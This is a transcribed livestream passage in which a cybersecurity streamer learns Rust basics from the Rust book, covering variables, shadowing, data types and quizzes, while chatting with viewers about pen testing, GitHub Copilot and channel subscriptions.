again, and I think that's where it's going to fail. Because once again, by default, it's immutable. So you can't change x to 6 unless you make x mutable. I think that's what it's teaching us. And I wonder if I can even get that error. The value of x is x, right? Oh, like that. And now one thing that we can do on our terminal, if we cd over to variables, we can do a rust check, rust c check rather. Or is it cargo check? Oh, it actually didn't fail. I thought it wouldn't. How about cargo run? Oh, I didn't save it. Maybe if I save the file, that would be a good starting point. Good job, Tyler, you freaking noob. Cargo check. Okay, so you can see it failed. Let's read this error message. Checking our variables cannot assign twice to immutable variable x. So exactly like I said, we'd have to change this to, would it be like that, maybe? Look at that. I fixed it myself. Yeah, so gosh, I'm a genius. Without even doing this, I had an idea of what we were doing. Not really a genius. Obviously super easy, but still. And it's actually showing us exactly what I just did. It's important that we get compile time errors when we attempt to change a value that's designated as immutable, because this very situation can lead to bugs. If one part of our code operates on the assumption that a value will never change, another part of our code changes that value, it's possible that the first part of the code won't do what it was designed to do. The cause of this kind of bug can be difficult to track down after the fact, especially when the second piece of code changes a value only sometimes. The Rust compiler guarantees that when you state that a value won't change, it really won't change, so you don't have to keep track of it yourself. Your code is thus easier to reason through. But mutability can be very useful and can make code more convenient to write. Although variables are immutable by default, you can make them mutable by adding mute, which is exactly what I did. As you did in chapter 2, adding mute also conveys intent to future readers of the code by indicating that other parts of the code will be changing this variable's value. For example, exactly what we did. Okay, beautiful. You're allowed to change the value bound to x from 5 to 6 when mute is used. Ultimately, deciding whether to use mutability or not is up to us and depends on what you think is clearest in that particular section. And we have a quiz. So which statement best describes what it means if a variable x is immutable? After being defined, x can be changed at most once. If variable x is immutable. After being defined, x can be changed at most once. No. X is stored in the immutable region of memory. Maybe x cannot be changed after being assigned a value. That's what it means. What is your keyword used after let to indicate a variable can be mutated, right? Well, not met. MUT. Determine whether the program will pass the compiler. If it passes, write the expected output of the program if it were executed. I don't see that, but so we're setting our main function, let x equal 1, and now we're printing x, and then we're trying to add to 1, and we're doing it. Well, x, once again, is immutable by default. You can't add to it unless you make it mutable, so I'm going to say it does not compile. Look, I got all the questions right. Beautiful. Graham Cracker J over on Twitch said, just tuned in, found you a couple days ago when I caught the back end of the Simply Cyber jaw jacket. Are you learning Rust to write your own software or more so for understanding for pen test purposes? You know, I don't even know my reason yet for learning Rust. It's literally just for fun. So like, I'm not a programmer. I'm not a developer. I'm barely even a scripter. Like I'm not great at programming. But what I like to do is like, I like hacking stuff, obviously, but sometimes I don't feel like hacking or doing a CTF. And when I don't feel like hacking or doing a CTF, I like to try to learn programming. So recently I was like, hey, let me just see if I can learn Rust just for the fun of it. So I'm literally just learning for the sake of learning. I don't even have an end goal on why I'm doing that. Daily Disclosure said, I like that you can use Rust and compile for any OS. Yeah, that's a cool thing about it, right? And that's a difference between, at least I might say this wrong, but a compiled language and like Python. If you send someone a Python program, unless you compile it to a .exe or whatever, they need Python to run it. With Rust, like my guessing game here, if you have Linux anyways, I could send it to you. I compiled it for Linux because I'm on Linux, but you could do the same thing in Windows and it would compile to a .exe, and you don't need Rust on your computer to run it because it's fully compiled. DJ B-Sec said, in this field we learn just because we like to learn. Yeah, absolutely. And because I don't have a life. This is what I do on a Saturday night. I learn new programming languages. All right, constants. Like immutable variables, constants are values that are bound to a name and are not allowed to change, but there are a few differences between constants and variables. First, you aren't allowed to use mute with constants. I guess, hence the name, it's constant, right? Constants aren't just immutable by default, they're always immutable. You declare constants using the const keyword instead of the let keyword, and the type of the value must be annotated. We'll cover types and type annotations in the next section, data types, so don't worry about the details right now. Just know that you must always annotate the type. Constants can be declared in any scope, including the global scope, which makes them useful for values that many parts of code need to know about. The last difference is that constants may be set only to a constant expression, not the result of a value that could only be completed at runtime. Here's an example of a constant declaration. Okay, so constant 3 hours in seconds, unsigned 32, so integer, right? 60 times 60 times 3. The constant's name is 3 hours in seconds, and its value is set to the result of multiplying 60, the number of seconds in a minute, by 60, the number of minutes in an hour, by 3, the number of hours we want to count in this program. Rust's naming convention for constants is to use all uppercase with underscores between words. The compiler is able to evaluate a limited set of operations at compile time, which lets us choose to write out this value in a way that's easier to understand and verify, rather than setting this constant to the value of 10,800. Okay, I think that makes sense to me. Constants are valid for the entire time a program runs within the scope in which they were declared. This property makes constants useful for values in your application domain that multiple parts of the program might need to know about, such as the maximum number of points any player of a game is allowed to earn or the speed of light. Naming hard-coded values used throughout your program as constants is useful in conveying the meaning of that value to the future maintainers of the code. It also helps to have only one place in your code you would need to change if the hard-coded value needed to be updated in the future. All right, I think that makes sense. Which of the following statements is correct about the difference between using let and const to declare a variable? The compiler will error if a constant variable name is not using. No, it won't error. A constant can be assigned to a literal, not in expressions involving computation. No, not true. Const can be used in the global scope, and let can only be used in a function. Maybe they are just different syntaxes. No, okay, so it's definitely this one. Determine whether the program will pass the compiler. If it passes, write the expected output of the program if it were executed. So we're setting a constant called 2, right? 1 plus 1 equals 2. And then we have our main function, and we're printing line 2. It should compile, and I think it would just print the number 2. All right, beautiful. Drink of water. Shadowing. As you saw in the guessing game tutorial in Chapter 2, you can declare a new variable with the same name as a previous variable. Rustaceans say that the first variable is shadowed by the second, which means that the second variable is what the compiler will see when you use the name of the variable. In effect, the second variable overshadows the first, taking any users of the variable name to itself until either it itself is shadowed or the scope ends. We can shadow a variable by using the same variable's name and repeating the use of the let keyword as follows. All right. Let me go ahead and just do this, right? I want to type it out because to build that muscle memory. So what are we doing? We're letting x equal 5, right? Nothing interesting there. And then we're saying let x equal x plus 1. You can't do that though, right? We'd have to make the x mutable to do that, right? Do another curly bracket. You can see, like, isn't that crazy? That's GitHub Copilot looking at public code and saying, hey, I'm guessing this is what you want to do, and it's actually right. But let x equal x times 2. Print the value of x is in the inner value of x in the inner scope is right. And then we're doing print line. That's not going to compile, right? Oh, shoot. No, it is. How does that work? Let x equal 5. Let x equal x plus 1, which would be 6. And then in the inner one, let x equal x times 2. Would that be 6 times 2, so 12? The value of the x in the inner scope is 12. The value of x is 6. The program first binds x to a value of 5. Yep. Then it creates a new variable x We already created x, though. By repeating let x equal, taking the original value and adding 1, so the value of x is in 6. Then within an inner scope created with the curly brackets, the third let statement also shadows x and creates a new variable, multiplying the previous value by 2 to give x a value of 12. When that scope is over, the inner shadowing ends and x returns to being 6. When we run this program, we'll output the following. No, so sure enough. But doesn't that defeat it being immutable? Okay. Let me read all this. Shadowing. So this is what we're doing. We're shadowing. Shadowing is different from marking a variable as immutable because we'll get a compile time error if we accidentally try to reassign to this variable without using the let keyword. Was that the difference? So the let is what's allowing us to shadow it. By using let, we can perform a few transformations in a value, but have the variable be immutable after those transformations have been completed. So what if I do let x equal x plus 2 now? Will that fail? No, it doesn't. How about this? All right, so then it fails. So it's the let keyword. The let keyword is key there. If we just try to assign the variable, then it fails. I see. So that's called shadowing. By using let, allows us to shadow. We can perform a few. Okay. The other difference between mute and shadowing is that because we're effectively creating a new variable when we use a let keyword again, we can change the type of the value, but reuse the same name. For example, say our program asks a user to show how many spaces they want between some text by inputting some characters, and then we want to store that input as a number. So let spaces equal whatever, and then spaces length. Okay? Change the type or reuse the same name. Let spaces equal spaces. The first spaces variable is a string type, and the second is a number type, because it's length. Shadowing thus spares us from having to come up with different names, such as spaces string and spaces number. Instead, we can reuse a simpler spaces name. However, if we try to use mute for this, as shown here, we'll get a compile time error. Oh, okay. Let mute, and what's our error saying? Mismatched types, right? Because one is a string and one is a number, an integer. So doing the let or the shadowing allows us to bypass that. All right, determine whether the program will pass the compiler. If it passes, write the expected output. All right, so let mutable x equal 1. So it's mutable. Let mutable x equal x. Let mutable x equal 1. And then within this inner one, we're saying let mutable x equal x. So in other words, let 1 equal 1. X plus equal 2. So that makes x 3. But only in the inner circle. And then we're printing x. I'm not sure if that compiles. I think it does. Oh, second question. Let mutable x equal 1. X equals hello world. No, that will not compile. We're going to get a string error, or a type error. Boom, I got it right. Gosh. Boom. That's what I'm talking about, y'all. I was correct in that. All right, data types, very exciting stuff. Tennessee Toon said, "Thank you, I love you and all you do for InfoSec homies, but I can't code. I have PPT and CRTO, my brain just doesn't like coding unless it's basic Python." Any advice? Dude, you don't need to be a coder or a programmer to be a pen tester at all, especially in light of ChatGPT. And if you get things like GitHub Copilot, right? Like, I can show you the power of GitHub Copilot real quick. At least I think I have GitHub Copilot here. If I erase all this, do I have GitHub Copilot enabled? Oh, maybe I don't have it. Oh, yeah, I do. I forgot how to talk. There we go. Oh, okay, whatever. Create, let's see. Create a program in Rust that, when compiled, will add a new user, Tyler, to the oh geez, I can't assist with that request either. All right, well, I guess it doesn't like that. But I mean, GitHub Copilot has been helpful for legit things like that. I'm trying to think of a non-malicious thing I can ask, right? Right. So we could even read this. I mean, that might be good practice. We see what's going on here, like everything we already know from before. We're using from our standard library. We're getting IP address and TCP stream. We have our target IP. We're starting at port 1. We're ending at the highest port. And then for port in start port, so we're doing a loop. If the port is open, right? If it's closed, don't do anything. And if the port is open, apparently try to connect to it. You know, so like even if you don't know coding and stuff, GitHub Copilot, ChatGPT will come in clutch for a lot of these things. Go back to what I was working on though. Let's see. Oh yeah, DJ BSEC, you're right. So DJ BSEC say you need to understand how to read the code it's spitting out and that you're and what you are asking for. Yeah. I mean, just in general, you need to understand how to read code when you're looking at exploits, because even if you're not a programmer, often you have to modify exploits, or if you're a pen tester, you don't want to fire off random exploits that you don't understand, right? You need to be able to understand them before you fire them off. Even for code review, like you can do code review without knowing how to code yourself if you know how to look for the right input and sinks and stuff like that. Thanks for the shares. You've been killing it. Thank you, my friend. Neffel said, I didn't know you were streaming. Has never got any message. What are we doing? Well, like I did an official walkthrough for Cyberlens, my new tri-hacking machine, and I was just going to sign off because I've just been working on learning Rust on my own for fun. And people in chat were like, Rust would be fun. So I'm streaming my own learning of Rust. This is not super exciting at all, but if people have questions, feel free to ask them. Yeah, dude, DJ BSEC, ChatGPT 4.0 is amazing with code. Okay, anyways. Let's do data types, which we could do if we jump out here. Cargo, new, data types. All right, go data types, source, main RS. Every value in Rust is of a certain data type, which tells Rust what kind of data is being specified so it knows how to work with that data. We'll look at two data type subsets, scalar and compound. Keep in mind that Rust is a statically typed language, which means that it must know the types of all variables at compile time. The compiler can usually infer what type we want to use based on the value and how we use it. In cases where many types are possible, such as when we converted a string to numeric type using parse in the comparing the guess string number section, we must add a type annotation like this. All right? So let guess U32, 42, and then parse expect not a number. Using parse section, we must add a type annotation. Okay. If we don't add the U32, so that's our type annotation, changing it to an unsigned 32, whatever. Oh, we got another subscriber. Get Glock, subscribe at tier 1. Thank you, y'all. I started the stream on Twitch with like 1 subscriber. Now we have 6. What? Amazing. Anyways, Rust will display the following errors, means the compiler needs more information from us to know which type we want to use. So, I mean, let's just do this, right? Guys, my VM froze. Are you joking me? You guys see that? It completely froze. Silliness. Give me just a second. Kali decided to die, so you don't program in Kali, apparently. Frick. Good Glock said, yeah, I was just talking to you on YouTube. Also see your vids on YouTube. Never able to see you live. Well, hey, cool to have you join me live. Appreciate it. I've been trying to stream a little more often. I mean, generally, my set time for streaming is every Wednesday night after I get my kids to bed. Oh. But then I randomly jump on as well. I'm trying to just like, I'm on my computer all the time, guys. Like, all the time. Like, way too often. Working on things. So I'm trying to, like, when I'm on my computer working on things, I'm trying to just go live and hang out with people, even if I'm not making like a standalone video for YouTube. Just to hang out, and you can work alongside of me, right? Even just throw me in the background, don't even pay attention to me. Sometimes it's helpful just to be working on your own with somebody else working, to provide some of that motivation as you're studying together. Getting my machine booted back up since it decided to die for some reason. I'll go back to sharing my screen in a moment. All right. What? Okay, we were to data types, right? All right, let me go back to my data types right here. So it said, if we don't add the 3032, it'll fail. Okay, got it. You see different data annotation. So the biggest thing is we need to annotate it this way, right? And let's just do that ourselves. Good practice to type this out. Let guess. Well, it's going to fail right now. Let's see if we can even finish it. See that? GitHub Copilot, amazing. View, word wrap, right? And if we go to terminal, right, that compiles, but if we delete the U32, yeah, then it freaks out. Okay. Scalar types. A scalar type represents a single value. Rust has 4 primary scalar types: integers, floating point numbers, booleans, and characters. You may recognize these from other programming languages. Let's jump into how they work in Rust. Integer types. An integer is a number without a fractional component. We use one integer type in Chapter 2, the U32 type. This type declaration indicates that the value it's associated with should be an unsigned integer. Signed integers start with I instead of U. That takes up 32 bits of space. Table 3-1 shows the built-in integer types in Rust. Okay. Each variant can be either signed or unsigned and has an explicit size. Signed and unsigned refer to whether it's possible for the number to be negative. In other words, whether the number needs to have a sign with it or whether it will only ever be positive and therefore represent without a sign. So we can't have, if we do U32 unsigned, we can't do -1. It's like grading numbers on a paper. When the sign matters, like a plus or a minus, a number is shown with a plus sign or a minus sign. However, when it's safe to assume the number is positive, it is shown with no sign. Signed numbers are stored using 2 complements representation. The frick is that? Oh, I got you. Okay. Each sign variant can store numbers from that to that, where n is the number of bits that variant uses. So an I8 or a sign 8 can store numbers from that to that, which equals negative 128 to 127. Unsigned variants can store numbers from 0 to 2n minus 1, so a U8 can store that. Okay. Additionally, the I size and U size types depend on the architecture of the computer your program is running on, which is denoted in the table as arch. 64 bits if you're in a 64-bit architecture, and yep. You can write integer literals in any of the forms shown in table 3-2. Note that number literals that can be multiple numeric types allow a type suffix, such as 57U8, to designate the type. Number literals can also use underscore as a visual separator to make the number easier to read, such as 1000, which will have the same values if you had specified 1000. All right, this type stuff's a little bit confusing. Laughman said, I usually watch on YouTube, but following is free. Yeah, watch on any platform. Wait, did we just get another subscriber? I die in my daydreams? Dude, amazing. Thank you over on Twitch. Appreciate it. All right, so how do you know which type of integer to use? Well, you ask ChatGPT. That's my answer. If you're unsure, Rust defaults are generally good places to start. Integer types default to I32. The primary situation use I size or U size is when indexing some sort of collection. Integer overflow. Let's say you have a variable type of U8 that can hold values between 0 and 255. If you try to change a variable to a value outside of that range, such as 256, integer overflow will occur, which can result in one of two behaviors. When you compile in debug mode, Rust includes checks for integer overflows that cause your program to panic at runtime if this behavior occurs. Rust uses the term panicking when a program exits with an error. We'll discuss panics in more depth in the unrecoverable errors with panic section in Chapter 9. When you compile in release mode with -- release, Rust does not include checks for integer overflow that cause panics. Instead, if overflow occurs, Rust performs 2's complement wrapping. In short, values greater than the maximum value the type can hold wrap around to the minimum of the values the type can hold. In the case of a U8, the value 256 becomes 0, 257 becomes 1. Oh, I got it. The program won't panic, but the variable will have a value that probably isn't what you were expecting it to have. Relying on integer overflows wrapping behavior is considered an error. Little bug in here. To explicitly handle the possibility of overflow, you can use these families of methods provided by the standard library for primitive number types. Wrap in all the modes with wrapping methods, such as wrapping add. Return the none value if there's overflow with checked methods. Return the value in a Boolean to indicate whether there's an overflow. And saturate at the value's minimum or maximum levels saturating methods. A lot more depth here than Python. Oh, we got DJ BSEC as well. Subscribe to Tier 1. Thank you, DJ BSEC. Appreciate it. Floating point types. Yeah, we need 2 more subscribers, guys, on Twitch. 2 more. Who's going to be the remaining 2 more subscribers to get me to 10 subscribers? Join the club, y'all. Oh, dude, nice. Laughing. I didn't realize that was you. Actually, when I did the live stream showing the Cyberlens machine, I explained that the script in Python didn't work, but someone did a pull request that fixes it, and I would go back through and approve it. I think I have write requests. Let me actually just check real quick. Actually, I'm going to do it on my other computer. Give me just a second. CVEs. Oh my goodness, we have 10 subscribers, ladies and gentlemen, over on Twitch. Get Glocked is an MVP. Thank you, my friend, for subscribing and doing a gift, for getting us up to 10. You're amazing. So cool. Thank you, my friend. All right, 1 second. Apache Tika. Pull requests, update. Oh, why am I not signed in here? All right, 1 second, y'all. Give me a moment. I don't have write access. All right. Let me get chat pulled back up. So, Laughlin, let me scroll back up to where you were at. If I'm saying your name, Laughlin. So I don't have write access, but I'll make sure I ping the people who do at Rhino to get your pull request approved to fix that script. Thank you for doing the pull request as well. Really appreciate it. All right. Back to our Rust learning journey. Rust also has two primitive types for floating point numbers, which are numbers with decimal points. Right? Go back to elementary school. That's where we first learned about that. Rust floating points are F32 and F64, so the F must be for floating point. No worries, I'm not hung up about it. Was just curious. I want to make sure I'm linking the official repo when I post my walkthrough. Yeah, you know what? Let me here. I'm going to stop sharing again because I'm going to log into Slack real quick. Yeah, it'd be nice for you to link the actual repo. So give me just a second. I'm actually on our Slack. And I'm going to ping. New THM machine. All right. Laughing, I just pinged the people who do have write access to that repo over on Slack. Technically, they're not working because it's the weekend, but you know they're all like me and don't have live, so they're probably going to be online throughout the weekend. So your pull request will probably get approved this weekend or early Monday. So just follow your email; you should see that come through. But thanks again for the pull request. All right, floating points. We have F32 and F64, which are 32 bits and 64 bits in size, respectively. The default type is F64 because on modern CPUs it's roughly the same speed as F32, but is capable of more precision. All floating point types are signed. Here's an example that shows floating point numbers in action. So let x equal 2.0. So it automatically is making it floating point 64. And then if we specify floating point 32, then that's how we would do it. Floating point numbers are represented according to the IEEE 754 standard. The F32 type is single precision float. F64 has double precision. All right, so we could do 2.01, whereas this can only be 3.0. Numeric operations. Rust supports the basic mathematical operations you'd expect for all the number types: addition, subtraction, multiplication, division, remainder. Integer division truncates towards 0 to the nearest integer. The following code shows how to use each numeric operation in a let statement. All right, I'm not going to type all this out, but we can look at it. So it's just let sum equal 5 plus 10, let difference equals that, let product 4 times 30, let quotient, let truncated, and let remainder. Like pretty common programming stuff here. Nothing too new. Each expression in these statements uses a mathematical operator and evaluates to a single value, which is then bound to a variable. The Boolean type. Oh, malware combat is / / a comment in Rust. Yes, it is a comment in Rust. Good observation. The Boolean type, as in most other programming languages, a Boolean type in Rust has two possible values, true and false. Booleans are 1 byte in size. The Boolean type in Rust is specified using bool. For example, let t equals true, let f bool, so we're specifying the type, equal false, with explicit type annotation. The main way to use Boolean values is through conditional, such as an if expression. We'll cover how if expressions work in Rust in the control flow section. All right, the character type. Rust's character type is the language's most primitive alphabetic type. Here are some examples of declaring character values. Let C equal Z. Let Z character equal Z. So that's with explicit type annotation. Let heart-eyed cat equal an emoji. Note that we specify character literals with single quotes as opposed to string literals, which use double quotes. Oh, we specify character literals with single quotes. Okay. Rust's character type is 4 bytes in size and represents a Unicode scalar value, which means it can represent a lot more than just ASCII. Accented letters, Chinese, Japanese, and Korean characters, emoji, and 0 with spaces are all valid char values in Rust. Unicode scalar values range from that to that to that. However, a character isn't really a concept in Unicode, so your human intuition for what a character is may not match up with what a character is in Rust. We'll discuss the topic in detail in Chapter 8. All right, let's see if we can knock out this quiz. The largest number represented by the type I don't freaking know. That part is confusing to me. So this is signed. I don't know if that's right. If x equals unsigned 8 equals 0, what will happen when computing x minus 1? It will panic. Oh, well, it depends on the compiler mode. Remember, if it's in debug mode, it will panic. If it's in release mode, it could do the integer overflow like automatic fix stuff. Determine whether the program will pass the compiler. If it passes, write the expected output. So let x f size equal 2.0. What was f size again? I don't know. Yeah, I didn't think I got those right. That part's, this type stuff's confusing. Okay, I was close on that one. So I got that one right. And that one was just the program does not compile. What was f size again? Wait, I thought I talked about f size up here. Didn't it? Oh, it does not exist. That makes sense. The type f size does not exist. All right, that's why I can't find it. Compound types. Compound types can group multiple values into one type. Rust has 2 primitive compound types, tuples and arrays. The tuple type. A tuple is a general way of grouping together a number of values with a variety of types into one compound type. Tuples have a fixed length. Once declared, they cannot grow or shrink in size. We create a tuple by writing a comma-separated list of values inside parentheses. Each position in the tuple has a type, and the types of the different values in the tuple don't have to be the same. All right, let's type this out for muscle memory. So let tuple, we're doing I32, right? So that's signed 32, floating point 64, unsigned 8 equals 500. That's fine. 6.4, yep, that's fine, and 1. Okay. The variable tuple binds to the entire tuple because a tuple is considered a single compound element. To get the individual values out of a tuple, we can use pattern matching to destructure a tuple value like this. Okay, let's type this out. Let tuple equal 500, 6.4, and 1. Okay? And now let x, y, z equal the tuple. So we're going to pull out from the tuple. Print line. The value of y is y. So, whoa, hold up. So it should be 6.4, right? Help. Unused variable. Oh, it's just telling me I didn't use those variables. The value of y is 6.4. Yeah, okay. The program creates a tuple and binds it to the variable tup. It then uses the pattern with let to take tup and turn it into 3 separate variables, x, y, and z. This is called destructuring because it breaks the single tuple into 3 parts. Finally, the program prints a value of y, which is 6.4. All right, that makes sense. I believe it's pronounced tuple and not tuple with the short u. Oh, tuple? I like tuple more. It's probably tuple. You're probably right, DJ BSEC. Tuple. We can also access a tuple element directly by using a period, followed by the index of the value we want to access. For example, Laughing says, I like tuple. All right, I'm just going to read this one. So let x equal, right, that, let 500 equal x dot 0. Okay, I get it. So x holds all of these. So x dot, remember, computers start counting at 0. So that's 0, 1, 2. So x0 is 500, x1 is 6.4, x2 is 1. The tuple without any values has a special name, a unit. This value and its corresponding type are both written in that and represent empty value or an empty return type. Expressions implicitly return the unit value if they don't return any other value. The array type. Another way to have a collection of multiple values is with an array. Unlike a tuple, every element of an array must have the same type. Unlike arrays in some other languages, arrays in Rust have a fixed length. We write the values in an array as a comma-separated list inside square brackets. It's like a Python dictionary. Arrays are useful when you want your data allocated on the stack rather than the heap. We'll discuss the stack and heap more in Chapter 4, or when you want to ensure you always have a fixed number of elements. An array isn't as flexible as the vector type, though. A vector is a similar collection type provided by the standard library that is allowed to grow or shrink in size. So we can't pop things off the array, is my understanding. Where a vector you can. Maybe. Over on YouTube said, oh, Malware Combat said it always said tuple as well. Vin, I don't know what Vin is saying on YouTube. A vector is a similar collection type provided by, all right, we read that. However, arrays are more useful when you know the number of elements will not need to change. For example, if you're using the names of the month in a program, you would probably use an array rather than a vector because you know it will always contain 12 elements, right? You write an array's type using square brackets with the type of each element, a semicolon, and then the number of elements in an array like so. Wow, so let A, and then we're doing our type of I32, so signed 32, and then 5. That's the number of data points in our array. You can also initialize an array to contain the same value for each element by specifying the initial value, followed by a semicolon, then the length of the array. So let A equal 3, 5. So will it be 5 3 times? Oh, we'll contain 5 elements. I'll be set to value 3. I mixed that up. So let A equal 3, 5 would be 5 3s. Accessing array elements. An array is a single chunk of memory of a known fixed size. It can be allocated in the stack. You can access elements of an array using indexing. So that's very similar to Python. So let A equal this. So this is our array. And if we want to access 1, it's A0 because computers starting at 0. So 0, 1, 2, 3, 4. So first would be, that's 1 and then 2. In this example, the variable name first will get the value 1 because that is a value at index 0 in the array. The variable name, blah, blah. Okay, got it. Invalid array element access. Let's see what happens if you try to access an element of array that is past the end of the array. Say you run this code. Similar guessing game to get an array. Let's just do it. So first, let's understand it. we're setting an array 1, 2, 3, 4, 5. Please enter an array index. Oh, it is very similar to our guessing thing. So let's just go like this. Cargo run. I don't know why. Please enter an array index. So if we do like 2, all right, 0, 1, 2. But what if we do 10? Oh no, it panicked! Index out of bounds. The code compiled successfully. If you run this code and enter that, it panics. The program resulted in a runtime error at the point of using invalid value in the indexing operation. The program exited with an error message and execute the final print line statement. When you attempt to access an element using indexing, Rux will check that the index you've specified is less. But what if you do? What if you compile it with release mode? Does it do the same thing where it like goes through it? If we do like right, so if we do 3, that's valid. But what if I do 10 now? Oh, it still panics even in the release mode. Okay, interesting. Okay, so this results in runtime error, blah, blah. This is an example of Rust memory safety principles in action. In many low-level languages, this kind of check is not done, and when you provide an incorrect index, invalid memory can be accessed. Rust protects you against this kind of error by immediately exiting instead of allowing the memory access and continuing. All right, quiz. Determine whether the program will pass the compiler. If it passes, write the expected output. So let message equal the temperature today is. Let x equal, we're making an array out of x. That would be the temperature of today is, and then 100. What the heck? Print line, bracket, bracket, and then x0. So that would be the temperature today is, and then 100. I don't think that compiles. How about this one? Let t equal. So this would be 2 1s. So it'll be 1 1 and then 4 3s. All right, so I gotta like type this out, right? So this would be t would be 1 1 like that, and then 4 3s. 1 2 3 4. All right, and then let, where the frick is AB coming from? Let AB equal T. That wouldn't compile either. Really? I don't understand this program quite. Let A, B equal T. Where's AB coming from? Oh, we're setting it. Let A, B equal T. Let A and B equal T. Let A... Okay. I want to understand this. So let T... This line declares a tuple with 2 elements. Each element is an array. So, okay, we have 2 arrays in there. So this is array 1. And this is array 2. I don't think I have my comment here correct either. the first array 1, 2 has 2 elements, and both are 1. The second array 3, 4 has 4 elements, and all are 3. I got that part. Let A, this is the line that confuses me. Let A and B equal T. This line destructures the tuple T into 2 variables A and B. I see. So then, like, at this point, A equals 1, 1, right? And B equals 3, 3, 3, 3. A is assigned the first array and B is assigned the second array. So then print line A0. So A0 at this point would be 1. So it's 1 plus T. Now we're back to T. Let AB equal T. So now we're back to T0. T10. Okay. So the first array, it'd be T1. So the second array there and the first number there. Okay, I get it now. I just had to slow down there. That makes sense to me. So T1, this is T right here. If it was T0, it would be the first array, but remember, computers start counting at 0. So T1 is 0, right? 0 and then 1. So it's saying it's referencing this one right here, and then it's referencing the first value of it, right? So it's referencing this one, and then it's referencing the first value of it, which is going to be a 3. So it's just ending with 1 plus 3 equals 4. Wow. You wouldn't think that little line of code be that confusing, but it does make sense to me now that I slowed it down. And once again, thank you, GitHub Copilot, for helping me understand that. All right. Okay, I think this is probably a good spot to stop. Look at all these commits. Amazing. About data types and variables. Oh, you know what else I need to update? Let me go to my README, and I want to update my bookmark. Let's update that. I save it. Well, why is it? Why can't I? It's like frozen up. Why isn't it just going through? The frick. I'm obviously a noob when it comes to Git. What the? It's frozen. I can't do anything. Oh my goodness, you stupid freaking thing. That happens in our line technology. So what I want to do is add my new bookmark, you stupid GitHub. Trash. Alright, that's all I want to do. Okay, y'all. We are slowly learning Rust. We had our data types. We made our guessing game. We learned about our variables and such. Compiled some stuff. All just learning a little bit as we go. And, you know, next time I work through this, if I have if I'm in a place where I can jump on stream, I'll jump on stream and keep doing this. I'm not going to make YouTube videos about this. This will just be standalone live streams of me learning Rust as I go. You're welcome to join me or just throw me on in the background as you work on your own stuff. Oh, nice, Laughlin. Laughlin said, I'm working on learning Rust right now as well via TCM. What do you think about their course? The reason I'm using the Rust... So my plan for learning Rust is I want to go through the Rust book and then... Is it Rustlings? Once I go through the Rust book, I want to go through the Rustlings. And maybe I should do it on... Do they go side by side? What's Rust by example? Oh, maybe this goes alongside of what I'm doing. Here, let me check this out now. Okay. So this Rust by example is just learning code as we go. I could do some streams of just working through some of these Rust by example things, like solving these programming challenges. I don't know if we do this, if I should do this after the Rust by book stuff or alongside of it. Anyways, lots, like what I enjoy about Rust is like so much of the learning, if not all of the official Rust learning, is all open source. I can stream it all, like no one's mad at me for streaming the content, and they teach it well. And I enjoy reading more than I enjoy videos, which is a little bit strange since, you know, I make stuff on YouTube, but if I have to choose between watching a video and reading content for learning, I prefer reading content. It helps it stick better in my brain. Yeah, Bottleneck. It's like their official book. I mean, Rust has so many good things, solid resources, all open source, and helpful to learn. Right? If you just go to like Rust book, here it is. Right? And the version I am using, there's a few different versions of it. Is this one. It says, want a more interactive learning experience? Try a different version of the Rust book featuring quizzes. So this is the Rust book that I'm going through because it has the quizzes. You can highlight things. It's just a little more interactive. But okay. Hey, y'all. Well, I do thank you all for taking the time to hang out with me. Hope you enjoyed the Cyberlens stuff. And if you haven't done the Cyberlens machine on TryHackMe, make sure you check it out. And want to say a special thank you to those of you on Twitch for allowing me to hit 10 subscribers. That's super exciting. And on YouTube, I know Jacob, if I remember right, did a super chat of $10. So thank you, Jacob, for the super chat. I appreciate it. Let's see who is all streaming right now, and we can raid someone over on the Twitch side of things. Oh, BlazeBits, sweet. Let's raid BlazeBits. I've been talking to him on Discord. He does a lot of really cool red teaming type stuff. So when we raid BlazeBits, let's here, let me grab his link real quick. Pull it up in my other tab. Just a second, y'all. There we go. I got him pulled up. When we raid BlazeBits, I want everybody over on Twitch. The raid message is hack smarter, not harder, right? He'll know who we are. So let's do it. Raid BlazeBits. All right, come join the raid, y'all. Join it up. If you're on YouTube and you want to join the raid, come on Twitch. All right, y'all. I'm going to sign off. We're going to do this raid, and I'll see you guys over on BlazeBits. Remember, hack smarter, not harder. I will see you guys there.